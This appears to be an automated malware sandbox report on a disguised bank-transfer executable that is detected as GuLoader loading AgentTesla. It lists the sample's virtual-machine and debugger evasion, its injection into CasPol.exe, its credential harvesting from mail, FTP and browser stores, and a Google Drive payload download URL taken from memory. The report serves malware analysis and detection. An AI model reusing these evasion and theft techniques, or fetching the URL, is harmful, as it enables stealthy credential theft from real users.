Source: Yara match File source: 00000002.00000002.329868071073.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Code function: 2_2_00406A78 push ebp; ret 2_2_00406A79
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Code function: 2_2_004081F5 push eax; ret 2_2_004081F6
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Code function: 2_2_02B7193C push ds; iretd 2_2_02B7194F
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Code function: 2_2_02B73576 push cs; iretd 2_2_02B73577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDEFE push es; iretd 11_2_00BCDF01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF2E push es; iretd 11_2_00BCDF31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF2A push es; iretd 11_2_00BCDF2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF26 push es; iretd 11_2_00BCDF29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF22 push es; iretd 11_2_00BCDF25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF1E push es; iretd 11_2_00BCDF21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF1A push es; iretd 11_2_00BCDF1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF16 push es; iretd 11_2_00BCDF19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF12 push es; iretd 11_2_00BCDF15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF0E push es; iretd 11_2_00BCDF11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF0A push es; iretd 11_2_00BCDF0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF06 push es; iretd 11_2_00BCDF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00BCDF02 push es; iretd 11_2_00BCDF05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00F83184 pushfd ; retf 11_2_00F83185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00FC2177 push edi; retn 0000h 11_2_00FC2179
Source: initial sample Static PE information: section name: .text entropy: 6.98717798783

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmp Binary or memory string: CROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BYST7N55Z6CYOUJFQB0EF6QJVN6HNYWC
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPEB
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 644 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9943 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe System information queried: ModuleInformation Jump to behavior
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmp Binary or memory string: crogram Files\Qemu-ga\qemu-ga.exe
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.334286652659.0000000000DC9000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.330770055666.0000000000DC9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exePEb

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AD6950 LdrInitializeThunk, 11_2_00AD6950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: BC0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" Jump to behavior
Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" Jump to behavior
Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
